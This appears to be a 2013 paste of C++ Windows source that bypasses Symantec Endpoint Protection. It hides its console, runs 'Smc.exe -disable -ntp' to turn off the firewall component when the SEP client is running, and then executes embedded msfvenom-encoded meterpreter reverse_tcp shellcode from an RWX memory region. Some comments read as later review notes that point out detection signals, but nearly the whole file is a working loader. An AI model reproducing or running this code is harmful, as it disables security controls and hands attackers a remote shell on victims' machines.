
Untitled

a guest Mar 11th, 2013 665 Never
  1. /******************************************************************************************
  2. *   Author: @_dark_knight_
*   Description: Bypassing Symantec Endpoint Protection (SEP).
*                           Runs a pre-generated msfvenom reverse_tcp meterpreter payload
*                           after first disabling SEP's Network Threat Protection
*                           (via "smc -disable -ntp") so the outbound connection to our
*                           attacking IP is not blocked by the host firewall component.
  7. *
  8. *   Special Notes: Process enumeration code lifted from: http://msdn.microsoft.com/en-
  9. *   us/library/windows/desktop/ms686701(v=vs.85).aspx
  10. *  
  11. *********************************************************************************************/
  12.  
  13. /*- Include files -*/
  14. #define _WIN32_WINNT 0x0500
  15. #include <iostream>
  16. #include <Windows.h>
  17. #include <tlhelp32.h>
  18. #include <tchar.h>
  19. #include <iostream>
  20. #include <WinBase.h>
  21.  
  22. //  Forward declarations:
  23. BOOL KillSymantec( );
  24.  
/*- Program entry point.
 *
 *  Flow, as written:
 *    1. hide the console window so nothing is visible to the logged-on user;
 *    2. call KillSymantec(), which (see its body) runs "Smc.exe -disable -ntp"
 *       when the SEP client process is present, then sleeps 10 s;
 *    3. allocate a PAGE_EXECUTE_READWRITE region, copy the encoded payload
 *       into it and jump to it;
 *    4. release the region if the payload ever returns.
 *
 *  Steps 3-4 are the stock msfvenom "C" loader pattern (RWX VirtualAlloc +
 *  RtlMoveMemory + cast-and-call).  Together with step 2 this is what a
 *  detection rule for this sample should key on: an Smc.exe "-disable -ntp"
 *  command line spawned through the command interpreter (system()), followed
 *  by a private RWX allocation that is executed immediately.
 *
 *  Returns 0 implicitly (C++ main) -- but only if the payload returns.
-*/
int main()
{
        /*- Base address of the RWX region that receives the payload -*/
        LPVOID lpvResult;

        /*- Hide console window -*/
        HWND hWnd = GetConsoleWindow();
        ShowWindow(hWnd, SW_HIDE);

        /*- Disable SEP Network Threat Protection if the SEP client (Smc.exe)
         *  is running.  The return value is ignored, so the payload is run
         *  whether or not SEP was found or the smc command succeeded. -*/
        KillSymantec();
       
        /* [*] x86/alpha_mixed succeeded with size 641 (iteration=1) */
        /*- Encoder output pasted verbatim from msfvenom (x86/alpha_mixed, per
         *  the line above).  The file header says this is a reverse_tcp
         *  meterpreter; the listener address and port are baked into these
         *  bytes and cannot be read off from the source. -*/
        char buf[] = "\x89\xe3\xdd\xc6\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49"
                        "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
                        "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
                        "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
                        "\x42\x75\x4a\x49\x59\x6c\x4d\x38\x6e\x69\x77\x70\x33\x30"
                        "\x65\x50\x73\x50\x4e\x69\x58\x65\x50\x31\x6a\x72\x72\x44"
                        "\x4c\x4b\x36\x32\x56\x50\x6e\x6b\x42\x72\x44\x4c\x4e\x6b"
                        "\x61\x42\x55\x44\x6e\x6b\x44\x32\x71\x38\x34\x4f\x48\x37"
                        "\x33\x7a\x35\x76\x50\x31\x4b\x4f\x34\x71\x6f\x30\x4c\x6c"
                        "\x47\x4c\x45\x31\x51\x6c\x57\x72\x46\x4c\x77\x50\x4a\x61"
                        "\x48\x4f\x74\x4d\x76\x61\x48\x47\x6d\x32\x48\x70\x30\x52"
                        "\x72\x77\x4e\x6b\x31\x42\x72\x30\x6e\x6b\x30\x42\x75\x6c"
                        "\x55\x51\x5a\x70\x6c\x4b\x63\x70\x64\x38\x4e\x65\x39\x50"
                        "\x51\x64\x70\x4a\x45\x51\x6a\x70\x70\x50\x6c\x4b\x47\x38"
                        "\x75\x48\x6e\x6b\x32\x78\x35\x70\x36\x61\x48\x53\x48\x63"
                        "\x67\x4c\x70\x49\x4e\x6b\x46\x54\x6e\x6b\x56\x61\x4b\x66"
                        "\x75\x61\x39\x6f\x35\x61\x79\x50\x4c\x6c\x6a\x61\x5a\x6f"
                        "\x64\x4d\x46\x61\x6b\x77\x65\x68\x4b\x50\x51\x65\x4b\x44"
                        "\x43\x33\x43\x4d\x58\x78\x47\x4b\x43\x4d\x35\x74\x61\x65"
                        "\x4a\x42\x71\x48\x6c\x4b\x71\x48\x66\x44\x55\x51\x4b\x63"
                        "\x53\x56\x4c\x4b\x44\x4c\x50\x4b\x6e\x6b\x31\x48\x57\x6c"
                        "\x75\x51\x4b\x63\x4c\x4b\x46\x64\x4e\x6b\x77\x71\x58\x50"
                        "\x4b\x39\x62\x64\x44\x64\x45\x74\x31\x4b\x71\x4b\x71\x71"
                        "\x73\x69\x63\x6a\x70\x51\x79\x6f\x4b\x50\x32\x78\x51\x4f"
                        "\x52\x7a\x6c\x4b\x54\x52\x5a\x4b\x6f\x76\x43\x6d\x32\x48"
                        "\x57\x43\x50\x32\x63\x30\x77\x70\x52\x48\x34\x37\x44\x33"
                        "\x65\x62\x53\x6f\x32\x74\x33\x58\x72\x6c\x44\x37\x74\x66"
                        "\x66\x67\x59\x6f\x68\x55\x4e\x58\x6a\x30\x53\x31\x53\x30"
                        "\x53\x30\x31\x39\x49\x54\x30\x54\x76\x30\x63\x58\x71\x39"
                        "\x4b\x30\x52\x4b\x67\x70\x59\x6f\x6a\x75\x70\x50\x66\x30"
                        "\x30\x50\x50\x50\x43\x70\x46\x30\x61\x50\x46\x30\x31\x78"
                        "\x6a\x4a\x34\x4f\x39\x4f\x6d\x30\x69\x6f\x48\x55\x4d\x47"
                        "\x53\x5a\x37\x75\x53\x58\x79\x50\x6e\x48\x63\x31\x45\x34"
                        "\x75\x38\x34\x42\x55\x50\x66\x61\x6d\x6b\x6c\x49\x6a\x46"
                        "\x63\x5a\x72\x30\x61\x46\x53\x67\x65\x38\x4f\x69\x59\x35"
                        "\x30\x74\x70\x61\x59\x6f\x48\x55\x4b\x35\x69\x50\x31\x64"
                        "\x36\x6c\x49\x6f\x70\x4e\x67\x78\x51\x65\x6a\x4c\x43\x58"
                        "\x7a\x50\x4c\x75\x6f\x52\x72\x76\x49\x6f\x5a\x75\x53\x5a"
                        "\x75\x50\x63\x5a\x66\x64\x62\x76\x50\x57\x31\x78\x36\x62"
                        "\x48\x59\x48\x48\x53\x6f\x6b\x4f\x38\x55\x4e\x6b\x77\x46"
                        "\x72\x4a\x61\x50\x65\x38\x65\x50\x32\x30\x57\x70\x63\x30"
                        "\x46\x36\x50\x6a\x47\x70\x53\x58\x56\x38\x49\x34\x53\x63"
                        "\x6b\x55\x39\x6f\x6a\x75\x4e\x73\x36\x33\x50\x6a\x73\x30"
                        "\x76\x36\x33\x63\x31\x47\x42\x48\x45\x52\x69\x49\x69\x58"
                        "\x33\x6f\x6b\x4f\x38\x55\x67\x71\x4f\x33\x65\x79\x4f\x36"
                        "\x6b\x35\x49\x66\x43\x45\x7a\x4c\x4b\x73\x41\x41";

                /*- Allocate memory.  Note sizeof buf also counts the string's
                 *  terminating NUL, so one byte more than the 641-byte payload
                 *  is allocated and copied; harmless.  The region is RWX from
                 *  the start rather than W then X -- the easiest signal for an
                 *  EDR memory scanner to catch. -*/
                lpvResult = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

                /*- Copy shellcode to allocated memory and transfer control to
                 *  it.  If the payload is a working reverse shell this call is
                 *  not expected to return, so the cleanup below never runs. -*/
                if (lpvResult != NULL ){
                          RtlMoveMemory(lpvResult, buf, sizeof buf);   
                          ((void(*)())lpvResult)();
                }      

                /*- Cleanup -- only reached if the payload returns.  It is also
                 *  reached when VirtualAlloc failed (lpvResult == NULL); then
                 *  VirtualFree simply fails, which is harmless here. -*/
                VirtualFree(lpvResult, 0, MEM_RELEASE);

}/*- End main -*/
  98.  
  99. /*- Enumerate process to confirm client is running Symantec Endpoint Protection.
  100. * Most of this code lifted from MSDN.
  101. -*/
/*- Walk the process list (Toolhelp snapshot, adapted from the MSDN sample) and,
 *  if the SEP client process Smc.exe is present, run the documented
 *  "smc -disable -ntp" command to turn off Network Threat Protection, so the
 *  payload's outbound connection is not blocked.
 *
 *  This function itself terminates nothing, despite its name: the only action
 *  taken is the smc command plus a 10 s wait for the change to settle.
 *
 *  Returns FALSE only when the snapshot cannot be created or its first entry
 *  cannot be read.
 *  NOTE(review): it returns TRUE whether or not Smc.exe was found, so the
 *  result does not "confirm" SEP is running as the original comment claimed;
 *  main() ignores the result anyway.
 *  NOTE(review): the Smc.exe path is hard-coded to the 32-bit Program Files
 *  location and is launched via system(), i.e. through the command
 *  interpreter -- both are high-signal in command-line telemetry, and the
 *  path will not match a 64-bit host's install location.
-*/
BOOL KillSymantec( )
{
  HANDLE snapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
  if( snapshot == INVALID_HANDLE_VALUE )
  {
    return FALSE;
  }

  PROCESSENTRY32 entry;
  entry.dwSize = sizeof entry;   // Toolhelp requires dwSize before the first call

  if( !Process32First( snapshot, &entry ) )
  {
    CloseHandle( snapshot );     // release the snapshot on the early-out path
    return FALSE;
  }

  for( ;; )
  {
    /* Exact, case-sensitive match on the image name reported by Toolhelp. */
    if( _tcscmp( entry.szExeFile, _T("Smc.exe") ) == 0 )
    {
      /*- Found the SEP client: disable Network Threat Protection and give
       *  the product time to apply the change before the payload runs. -*/
      system("\"C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");
      Sleep(10000);
      break;
    }

    if( !Process32Next( snapshot, &entry ) )
    {
      break;                     // end of list (or error): nothing more to check
    }
  }

  CloseHandle( snapshot );
  return TRUE;
}